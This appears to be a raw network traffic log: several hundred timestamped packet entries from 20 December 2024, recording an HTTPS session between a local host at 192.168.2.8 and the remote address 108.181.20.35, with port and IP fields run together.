                                                                  Dec 20, 2024 17:42:29.915169001 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.915216923 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:29.954674959 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.954708099 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.954819918 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:29.954839945 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:29.954894066 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.010391951 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.010427952 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.010600090 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.010627031 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.010703087 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.042613983 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.042649031 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.042843103 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.042855024 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.042978048 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.071914911 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.071940899 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.072024107 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.072035074 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.072076082 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.093456030 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.093488932 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.093633890 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.093643904 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.093736887 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.115550995 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.115585089 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.115748882 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.115782976 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.115890026 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.133888960 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.133918047 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.133970976 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.133991957 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.134027004 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.134047985 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.151082993 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.151115894 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.151190042 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.151207924 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.151268005 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.167135954 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.167165041 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.167223930 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.167242050 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.167273045 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.167294025 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.180454016 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.180480957 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.180541992 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.180560112 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.180588007 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.180608988 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.195979118 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.196017981 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.196067095 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.196096897 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.196124077 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.196149111 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.208250999 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.208273888 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.208331108 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.208348989 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.208376884 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.208400965 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.221292019 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.221337080 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.221381903 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.221398115 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.221431017 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.221455097 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.233926058 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.233961105 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.234051943 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.234062910 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.234138012 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.245124102 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.245145082 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.245254993 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.245265007 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.245351076 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.254740000 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.254770994 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.254823923 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.254832983 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.254857063 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.254877090 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.262366056 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.262384892 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.262453079 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.262460947 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.262537003 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.270883083 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.270912886 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.271007061 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.271018982 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.271081924 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.278884888 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.278903008 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.278954029 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.278961897 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.278984070 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.279001951 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.286267996 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.286293030 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.286395073 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.286405087 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.286485910 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.293725014 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.293741941 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.293881893 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.293903112 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.293971062 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.300035954 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.300055027 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.300204992 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.300226927 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.300304890 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.307005882 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.307034016 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.307145119 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.307162046 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.307230949 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.314150095 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.314169884 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.314321995 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.314337969 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.314419031 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.320203066 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.320228100 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.320350885 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.320368052 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.320444107 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.326622963 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.326641083 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.326778889 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.326796055 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.326936007 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.332211971 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.332231998 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.332298994 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.332308054 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.332348108 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.338104963 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.338141918 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.338247061 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.338263035 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.338342905 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.384227037 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.384260893 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.384376049 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.384407043 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.384507895 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.484772921 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.484807014 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.484865904 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.484910011 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.484946012 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.484992027 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.486628056 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.486645937 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.486717939 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.486740112 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.486793995 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.489778042 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.489797115 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.489852905 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.489861012 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.489928007 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.492255926 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.492274046 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.492342949 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.492353916 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.492420912 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.494668007 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.494692087 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.494779110 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.494787931 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.494832993 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.497792959 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.497817039 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.497884035 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.497893095 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.497946978 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.500509977 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.500526905 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.500600100 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.500607967 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.500653028 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.574500084 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.574551105 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.574671030 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.574759960 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.574799061 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.574961901 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.677016973 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.677047014 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.677185059 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.677207947 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.677259922 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.679229021 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.679245949 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.679307938 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.679322004 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.679368019 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.681859970 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.681895971 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.681946993 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.681955099 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.681982994 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.681999922 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.684242964 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.684262037 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.684322119 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.684329987 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.684366941 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.686907053 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.686930895 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.686991930 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.687000990 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.687057018 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.689874887 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.689893007 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.689944983 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.689954042 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.690000057 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.692506075 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.692532063 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.692661047 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.692668915 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.692749977 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.766736984 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.766757965 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.766834974 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.766864061 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.766922951 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.872829914 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.872859001 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.872991085 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.873003006 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.873075962 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.875060081 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.875082970 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.875154972 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.875163078 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.875201941 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.877253056 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.877274036 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.877346039 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.877353907 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.877393961 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.880321026 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.880351067 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.880403042 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.880429029 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.880455971 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.880476952 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.882652044 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.882668972 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.882742882 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.882757902 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.882797003 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.885783911 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.885801077 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.886183023 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.886209011 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.886271000 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.888385057 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.888402939 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.888761044 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.888768911 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.888861895 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.958894968 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.958921909 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.959033966 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:30.959047079 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:30.959094048 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.065798998 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.065830946 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.066008091 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.066019058 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.066061020 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.067631960 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.067653894 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.067760944 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.067770004 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.067815065 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.070619106 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.070660114 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.070755959 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.070764065 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.070808887 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.073076963 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.073132038 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.073198080 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.073204994 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.073262930 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.073271990 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.075870991 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.075913906 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.075994015 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.076000929 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.076021910 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.076046944 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.078705072 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.078752041 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.078794003 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.078800917 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.078825951 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.078845978 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.081335068 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.081378937 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.081415892 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.081425905 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.081497908 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.150762081 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.150788069 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.150880098 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.150890112 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.150929928 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.257975101 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.257997036 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.258169889 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.258186102 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.258238077 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.260648012 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.260663986 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.260746002 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.260755062 CET44349707108.181.20.35192.168.2.8
                                                                  Dec 20, 2024 17:42:31.260795116 CET49707443192.168.2.8108.181.20.35
                                                                  Dec 20, 2024 17:42:31.263050079 CET44349707108.181.20.35192.168.2.8
